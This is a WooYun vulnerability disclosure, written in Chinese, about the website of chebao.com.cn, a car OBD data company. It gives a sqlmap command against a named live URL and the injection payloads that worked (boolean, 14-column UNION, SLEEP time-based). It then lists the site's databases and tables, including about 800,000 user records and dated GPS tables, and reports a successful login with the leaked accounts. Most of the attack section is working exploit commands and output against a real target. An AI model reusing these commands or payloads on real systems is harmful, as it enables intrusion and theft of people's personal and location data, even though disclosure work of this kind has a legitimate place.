乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-10: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-11-24: 厂商已经主动忽略漏洞,细节向公众公开
车宝(OBD设备)安全驾驶数据公司存在漏洞泄露会员信息
http://www.chebao.com.cn:80/index.php/Content/faqList/id/8
伪静态注入
python sqlmap.py -u "http://www.chebao.com.cn:80/index.php/Content/faqList/id/8*"
---Place: URIParameter: #1* Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://www.chebao.com.cn:80/index.php/Content/faqList/id/8 AND 7726=7726 Type: UNION query Title: MySQL UNION query (NULL) - 14 columns Payload: http://www.chebao.com.cn:80/index.php/Content/faqList/id/8 UNION ALL SELECT NULL,CONCAT(0x7163756971,0x4a44716272437778614b,0x71646f7571),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: http://www.chebao.com.cn:80/index.php/Content/faqList/id/8 AND SLEEP(5)---back-end DBMS: MySQL 5.0.11sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: URIParameter: #1* Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://www.chebao.com.cn:80/index.php/Content/faqList/id/8 AND 7726=7726 Type: UNION query Title: MySQL UNION query (NULL) - 14 columns Payload: http://www.chebao.com.cn:80/index.php/Content/faqList/id/8 UNION ALL SELECT NULL,CONCAT(0x7163756971,0x4a44716272437778614b,0x71646f7571),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: http://www.chebao.com.cn:80/index.php/Content/faqList/id/8 AND SLEEP(5)---back-end DBMS: MySQL 5.0.11available databases [5]:[*] cbubi[*] information_schema[*] mysql[*] performance_schema[*] test
用户量也是不少
back-end DBMS: MySQL 5.0.11Database: cbubi+------------------------------------+---------+| Table | Entries |+------------------------------------+---------+| tal_daydetail_xn | 1330960 || cb_user | 802958 || cb_user_bk_0831 | 801500 || cb_jsz | 788153 || obd_drive | 654573 || tal_oil_detail_info | 581431 || tal_oil_detail_info_0908 | 491600 || tal_income_logs | 328831 || obd_gps_data_20150601 | 315904 || obd_gps_data_20150530 | 314009 || obd_gps_data_20150531 | 301170 || obd_gps_data_20150529 | 280027 || obd_gps_data_20150926 | 244207 || tal_daydetail | 228955 || obd_gps_data_20150602 | 221998 || obd_gps_data_20150904 | 200947 || obd_gps_data_ljs_20150527 | 200118 || obd_gps_data_ljs_20150520 | 198860 || obd_gps_data_20150925 | 198269 |
随机测试,登陆成功
过滤
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)